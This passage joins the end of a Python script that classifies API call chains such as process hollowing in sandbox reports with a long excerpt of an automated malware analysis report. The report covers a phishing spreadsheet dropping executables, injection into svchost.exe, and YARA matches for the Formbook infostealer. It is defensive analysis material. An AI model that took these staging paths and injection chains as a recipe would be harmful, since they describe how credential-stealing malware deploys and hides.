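    m = SUFFIX_RE.match(api)
    return m.group(1) if m else api


def parse_report(lines):
    """Return one record per 'Code function' line; other lines are ignored."""
    records = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        apis = [normalise(a) for a in (m.group("apis") or "").split(",") if a]
        pid, _stage, addr = m.group("fid").split("_")
        records.append({"source": m.group("source"), "fid": m.group("fid"),
                        "pid": int(pid), "addr": int(addr, 16), "apis": apis})
    return records


def in_order(chain, needles):
    """True if every needle appears in chain, in order (gaps allowed)."""
    it = iter(chain)
    return all(any(api == n for api in it) for n in needles)


def classify(apis):
    return [name for name, needles in CHAINS.items() if in_order(apis, needles)]


def analyse(lines):
    """Map source image -> [(function id or '*', technique label)]."""
    findings = defaultdict(list)
    seen = defaultdict(set)
    for rec in parse_report(lines):
        seen[rec["source"]].update(rec["apis"])
        for name in classify(rec["apis"]):
            findings[rec["source"]].append((rec["fid"], name))
    for source, apis in seen.items():
        for name, needed in CAPABILITIES.items():
            if needed <= apis:
                findings[source].append(("*", name))
    return dict(findings)


if __name__ == "__main__":
    for source, hits in analyse(SAMPLE_LINES).items():
        for fid, name in hits:
            print(f"{source}\t{fid}\t{name}")
```

The per-function chains are static findings: the report lists what a function can call, not what it called at runtime, so a matched hollowing chain is a strong hint rather than proof, and the runtime evidence is the separate behavioural signatures. The per-process set is weaker still, since NtOpenProcess, NtWriteVirtualMemory and NtQueueApcThread being present as stubs only says the primitives exist.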
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406925 4_2_00406925
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C4E37C 5_3_03C4E37C
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C3133F 5_3_03C3133F
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C3F24C 5_3_03C3F24C
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C5322F 5_3_03C5322F
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CC01DD 5_3_03CC01DD
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C2D15B 5_3_03C2D15B
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C5113B 5_3_03C5113B
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C467DB 5_3_03C467DB
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C27753 5_3_03C27753
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C22705 5_3_03C22705
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CC1638 5_3_03CC1638
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C3945A 5_3_03C3945A
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CA5B9A 5_3_03CA5B9A
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C2CBBC 5_3_03C2CBBC
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C2EAC1 5_3_03C2EAC1
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C24A80 5_3_03C24A80
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CC2A22 5_3_03CC2A22
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C3C9F0 5_3_03C3C9F0
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C31889 5_3_03C31889
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CADFDA 5_3_03CADFDA
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C1FFD7 5_3_03C1FFD7
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CCCFA4 5_3_03CCCFA4
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C47F00 5_3_03C47F00
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CD3E83 5_3_03CD3E83
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C36DFE 5_3_03C36DFE
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CC0D8E 5_3_03CC0D8E
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C22DB2 5_3_03C22DB2
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CA5D55 5_3_03CA5D55
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CBFCEE 5_3_03CBFCEE
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C2CC5C 5_3_03C2CC5C
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C42C6D 5_3_03C42C6D
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BF33B7 5_2_00BF33B7
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BD1663 5_2_00BD1663
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BF23F5 5_2_00BF23F5
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C58400 5_2_00C58400
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C06502 5_2_00C06502
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BDE6F0 5_2_00BDE6F0
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C0265E 5_2_00C0265E
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BF282A 5_2_00BF282A
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C2391F 5_3_03C2391F
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041B871 6_2_0041B871
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00401030 6_2_00401030
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041CBC6 6_2_0041CBC6
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041BBDB 6_2_0041BBDB
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041C3A2 6_2_0041C3A2
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041BC4D 6_2_0041BC4D
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00408C6B 6_2_00408C6B
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00408C70 6_2_00408C70
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00408C2A 6_2_00408C2A
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041BCF3 6_2_0041BCF3
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041B4B6 6_2_0041B4B6
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041BD21 6_2_0041BD21
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00402D89 6_2_00402D89
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00402D90 6_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041C7FE 6_2_0041C7FE
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00402FB0 6_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BEE0C6 6_2_00BEE0C6
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C0905A 6_2_00C0905A
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C1D005 6_2_00C1D005
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BF3040 6_2_00BF3040
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BEE2E9 6_2_00BEE2E9
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C91238 6_2_00C91238
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C163DB 6_2_00C163DB
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BEF3CF 6_2_00BEF3CF
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C963BF 6_2_00C963BF
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C3A37B 6_2_00C3A37B
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BF2305 6_2_00BF2305
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BF7353 6_2_00BF7353
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C25485 6_2_00C25485
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C01489 6_2_00C01489
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C2D47D 6_2_00C2D47D
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C7443E 6_2_00C7443E
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C0C5F0 6_2_00C0C5F0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C36540 6_2_00C36540
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BF351F 6_2_00BF351F
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BF4680 6_2_00BF4680
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BFE6C1 6_2_00BFE6C1
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C92622 6_2_00C92622
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C3A634 6_2_00C3A634
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C257C3 6_2_00C257C3
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BFC7BC 6_2_00BFC7BC
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C7579A 6_2_00C7579A
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C8F8EE 6_2_00C8F8EE
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C1286D 6_2_00C1286D
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BFC85C 6_2_00BFC85C
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BF29B2 6_2_00BF29B2
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C069FE 6_2_00C069FE
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C9098E 6_2_00C9098E
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C7394B 6_2_00C7394B
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C75955 6_2_00C75955
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00CA3A83 6_2_00CA3A83
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C7DBDA 6_2_00C7DBDA
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BEFBD7 6_2_00BEFBD7
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C9CBA4 6_2_00C9CBA4
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C17B00 6_2_00C17B00
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C8FDDD 6_2_00C8FDDD
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BFCD5B 6_2_00BFCD5B
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C20D3B 6_2_00C20D3B
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C0EE4C 6_2_00C0EE4C
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C22E2F 6_2_00C22E2F
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C62FDC 6_2_00C62FDC
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C8CFB1 6_2_00C8CFB1
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C1DF7C 6_2_00C1DF7C
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C00F3F 6_2_00C00F3F
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00401030 6_1_00401030
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041C3A2 6_1_0041C3A2
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041B4B6 6_1_0041B4B6
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041C7FE 6_1_0041C7FE
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041B871 6_1_0041B871
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041CBC6 6_1_0041CBC6
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041BBDB 6_1_0041BBDB
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041BC4D 6_1_0041BC4D
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00408C6B 6_1_00408C6B
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00408C70 6_1_00408C70
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00408C2A 6_1_00408C2A
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041BCF3 6_1_0041BCF3
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041BD21 6_1_0041BD21
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00402D89 6_1_00402D89
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00402D90 6_1_00402D90
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00402FB0 6_1_00402FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0085E0C6 10_2_0085E0C6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0088D005 10_2_0088D005
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00863040 10_2_00863040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0087905A 10_2_0087905A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0085E2E9 10_2_0085E2E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00901238 10_2_00901238
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_009063BF 10_2_009063BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0085F3CF 10_2_0085F3CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008863DB 10_2_008863DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00862305 10_2_00862305
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00867353 10_2_00867353
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008AA37B 10_2_008AA37B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00895485 10_2_00895485
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00871489 10_2_00871489
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008E443E 10_2_008E443E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0089D47D 10_2_0089D47D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0087C5F0 10_2_0087C5F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0086351F 10_2_0086351F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008A6540 10_2_008A6540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00864680 10_2_00864680
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0086E6C1 10_2_0086E6C1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00902622 10_2_00902622
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008AA634 10_2_008AA634
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008E579A 10_2_008E579A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0086C7BC 10_2_0086C7BC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008957C3 10_2_008957C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008FF8EE 10_2_008FF8EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0086C85C 10_2_0086C85C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0088286D 10_2_0088286D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0090098E 10_2_0090098E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008629B2 10_2_008629B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008769FE 10_2_008769FE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008E394B 10_2_008E394B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008E5955 10_2_008E5955
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00913A83 10_2_00913A83
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0090CBA4 10_2_0090CBA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0085FBD7 10_2_0085FBD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008EDBDA 10_2_008EDBDA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00887B00 10_2_00887B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008FFDDD 10_2_008FFDDD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00890D3B 10_2_00890D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0086CD5B 10_2_0086CD5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00892E2F 10_2_00892E2F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0087EE4C 10_2_0087EE4C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008FCFB1 10_2_008FCFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008D2FDC 10_2_008D2FDC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00870F3F 10_2_00870F3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0088DF7C 10_2_0088DF7C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009B4B6 10_2_0009B4B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009C7FE 10_2_0009C7FE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009B871 10_2_0009B871
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009CBC6 10_2_0009CBC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009BBDB 10_2_0009BBDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00088C2A 10_2_00088C2A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009BC4D 10_2_0009BC4D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00088C6B 10_2_00088C6B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00088C70 10_2_00088C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00082D89 10_2_00082D89
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00082D90 10_2_00082D90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00082FB0 10_2_00082FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_007867C7 10_2_007867C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00785062 10_2_00785062
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_007832FF 10_2_007832FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00781362 10_2_00781362
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00783302 10_2_00783302
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_007875B2 10_2_007875B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_007808F9 10_2_007808F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00780902 10_2_00780902
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Purchase Order.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: String function: 00419F80 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: String function: 00C33F92 appears 132 times
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: String function: 0041A0B0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: String function: 00BEDF5C appears 119 times
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: String function: 00C3373B appears 244 times
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: String function: 00BEE2A8 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: String function: 00C5F970 appears 84 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0085E2A8 appears 38 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 008CF970 appears 84 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 008A373B appears 245 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 008A3F92 appears 132 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0085DF5C appears 120 times
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: String function: 03C1E35C appears 96 times
PE file contains strange resources
Source: scancopy87867678[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: acqyswhf.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: acqyswhf.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: acqyswhf.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: acqyswhf.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: acqyswhf.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: acqyswhf.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dtz25z5e9sr.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dtz25z5e9sr.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dtz25z5e9sr.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dtz25z5e9sr.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dtz25z5e9sr.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dtz25z5e9sr.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
